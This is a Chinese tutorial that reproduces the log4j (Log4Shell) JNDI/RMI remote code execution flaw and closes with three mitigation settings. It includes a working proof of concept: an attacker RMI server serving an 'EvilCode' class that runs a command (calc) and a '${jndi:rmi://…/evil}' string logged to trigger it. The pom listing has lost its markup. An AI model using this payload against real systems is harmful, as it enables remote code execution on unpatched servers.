Java RMI引起的log4j漏洞问题分析

这篇文章主要介绍"Java RMI引起的log4j漏洞问题分析"，在日常操作中，相信很多人在Java RMI引起的log4j漏洞问题分析问题上存在疑惑，小编查阅了各式资料，整理出简单好用的操作方法，希望对大家解答"Java RMI引起的log4j漏洞问题分析"的疑惑有所帮助！接下来，请跟着小编一起来学习吧！

RMI和JNDIRMI

• （Remote Method Invocation） 即Java远程方法调用，一种用于实现远程过程调用的应用程序编程接口

• JNDI (Java Naming and Directory Interface)是一个应用程序设计的API，为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口

• JNDI和RMI的主要关系是RMI注册的服务可以通过JNDIAPI访问。在讨论到Spring反序列化漏洞之前，先看看如果通过JNDI来调用RMI注册的服务。

模拟漏洞重现

pom依赖

            org.springframework.boot            spring-boot-starter-web                                                org.springframework.boot                    spring-boot-starter-logging                                                                org.apache.logging.log4j            log4j-api            2.14.0                            org.apache.logging.log4j            log4j-core            2.14.0        

黑客端

/** * 构建RMI服务来响应恶意代码 * 
 * Java RMI，即 远程方法调用（Remote Method Invocation），一种用于实现远程过程调用(RPC)的Java API， 能直接传输序列化后的Java对象和分布式垃圾收集。它的实现依赖于(JVM)，因此它仅支持从一个JVM到另一个JVM的调用。 */public class RMIServer {  @SneakyThrows  public static void main(String... args) {    try {      // 本地主机上的远程对象注册表Registry的实例,默认端口1099      LocateRegistry.createRegistry(1099);      Registry registry = LocateRegistry.getRegistry();      System.out.println("Create RMI registry on port 1099");      //返回的Java对象      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);      // 把远程对象注册到RMI注册服务器上，并命名为evil      registry.bind("evil", referenceWrapper);    } catch (RemoteException | AlreadyBoundException | NamingException e) {      e.printStackTrace();    }  }/** * 执行任意的脚本，目前的脚本会使windows服务器打开计算器. */public class EvilCode {  static {    System.out.println("受害服务器将执行下面命令行");    Process p;    String[] cmd = {"calc"};    try {      p = Runtime.getRuntime().exec(cmd);      InputStream fis = p.getInputStream();      InputStreamReader isr = new InputStreamReader(fis);      BufferedReader br = new BufferedReader(isr);      String line = null;      while ((line = br.readLine()) != null) {        System.out.println(line);      }    } catch (IOException e) {      e.printStackTrace();    }  }}

网站端

public class Server {  private static final Logger logger = LogManager.getLogger();  public static void main(String[] args) {    String name = "${java:runtime}";    logger.info("name:{}", name);    //模拟填写数据,输入构造好的字符串,使受害服务器打印日志时执行远程的代码 同一台可以使用127.0.0.1    String username = "${jndi:rmi://127.0.0.1:1099/evil}";    //正常打印业务日志    logger.error("username:{}", username);  }}

【紧急补救措施3选1】

• 修改 JVM 参数 -Dlog4j2.formatMsgNoLookups=true

• 修改配置 log4j2.formatMsgNoLookups=True

• 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

到此，关于"Java RMI引起的log4j漏洞问题分析"的学习就结束了，希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习，快去试试吧！若想继续学习更多相关知识，请继续关注网站，小编会继续努力为大家带来更多实用的文章！